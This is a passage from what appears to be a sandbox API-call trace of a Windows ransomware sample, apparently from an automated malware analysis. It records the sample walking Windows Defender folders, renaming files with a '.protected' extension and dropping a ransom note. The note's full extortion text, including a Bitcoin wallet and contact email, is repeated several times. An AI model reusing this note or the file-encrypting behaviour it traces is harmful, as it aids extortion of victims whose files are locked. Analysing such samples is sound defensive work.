lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.595] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.595] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0071.596] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0071.596] CloseHandle (hObject=0xd8) returned 1 [0071.597] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.protected") returned 126 [0071.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll.protected")) returned 1 [0071.597] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.597] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.597] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt") returned 121 [0071.597] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.599] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.599] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.599] lstrlenA (lpString="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") returned 684 [0071.599] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.599] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.599] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.599] CloseHandle (hObject=0xd4) returned 1 [0071.599] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.600] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.600] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt") returned 82 [0071.600] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.601] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.601] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.601] lstrlenA (lpString="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") returned 684 [0071.601] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.602] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.602] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.602] CloseHandle (hObject=0xb4) returned 1 [0071.602] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="Windows") returned -1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="Program Files") returned -1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="Program Files (x86)") returned -1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="$Recycle.bin") returned 1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="System Volume Information") returned -1 [0071.602] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy") returned 55 [0071.602] lstrcmpW (lpString1="LocalCopy", lpString2=".") returned 1 [0071.602] lstrcmpW (lpString1="LocalCopy", lpString2="..") returned 1 [0071.602] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*") returned 57 [0071.602] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.602] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.602] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.602] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.602] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.602] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.602] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\.") returned 57 [0071.602] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.602] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | 
out: lpFindFileData=0x295ef20) returned 1 [0071.602] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.602] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.602] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.602] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.602] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.602] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\..") returned 58 [0071.602] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.602] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.602] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.602] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.603] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt") returned 73 [0071.603] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\localcopy\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.604] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.604] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.604] lstrlenA (lpString="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") returned 684 [0071.604] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.604] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.604] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.604] CloseHandle (hObject=0xb4) returned 1 [0071.605] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="Windows") returned -1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="Program Files") returned 1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="Program Files (x86)") returned 1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="$Recycle.bin") returned 1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="System Volume Information") returned -1 [0071.605] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine") returned 56 [0071.605] lstrcmpW (lpString1="Quarantine", lpString2=".") returned 1 [0071.605] lstrcmpW (lpString1="Quarantine", lpString2="..") returned 1 [0071.605] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*") returned 58 [0071.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.605] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.605] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.605] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.605] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.605] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.605] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\.") returned 58 [0071.605] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.605] FindNextFileW (in: hFindFile=0x447c80, 
lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.605] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.605] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.605] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.605] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.605] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.605] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\..") returned 59 [0071.605] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.605] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.605] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.610] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.610] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt") returned 74 [0071.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\quarantine\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.610] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.610] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.613] lstrlenA (lpString="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") returned 684 [0071.613] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.614] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.614] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.614] CloseHandle (hObject=0xb4) returned 1 [0071.614] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="Windows") returned -1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="Program Files") returned 1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="Program Files (x86)") returned 1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="$Recycle.bin") returned 1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="System Volume Information") returned -1 [0071.614] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans") returned 51 [0071.614] lstrcmpW (lpString1="Scans", lpString2=".") returned 1 [0071.614] lstrcmpW (lpString1="Scans", lpString2="..") returned 1 [0071.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*") returned 53 [0071.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.615] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.615] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.615] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.615] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.615] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.616] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\.") returned 53 [0071.616] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.616] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 
[0071.616] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.616] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.616] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\..") returned 54 [0071.616] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.616] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.616] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.616] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0071.616] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0071.616] lstrcmpiW (lpString1="History", lpString2="Program Files (x86)") returned -1 [0071.616] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0071.616] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0071.616] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History") returned 59 [0071.616] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0071.616] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0071.616] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*") returned 61 [0071.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.616] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.616] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0071.616] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.616] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.616] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.616] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\.") returned 61 [0071.616] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.616] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.617] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.617] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.617] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\..") returned 62 [0071.617] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.617] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="Windows") returned -1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="Program Files") returned -1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="Program Files (x86)") returned -1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="$Recycle.bin") returned 1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="System Volume Information") returned -1 [0071.617] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 72 [0071.617] lstrcmpW (lpString1="CacheManager", lpString2=".") returned 1 [0071.617] lstrcmpW (lpString1="CacheManager", lpString2="..") returned 1 [0071.617] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned 74 [0071.617] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0071.617] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.617] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.617] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.617] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.617] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.617] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\.") returned 74 [0071.617] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.617] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.617] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.617] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.617] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.617] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.617] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.617] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\..") returned 
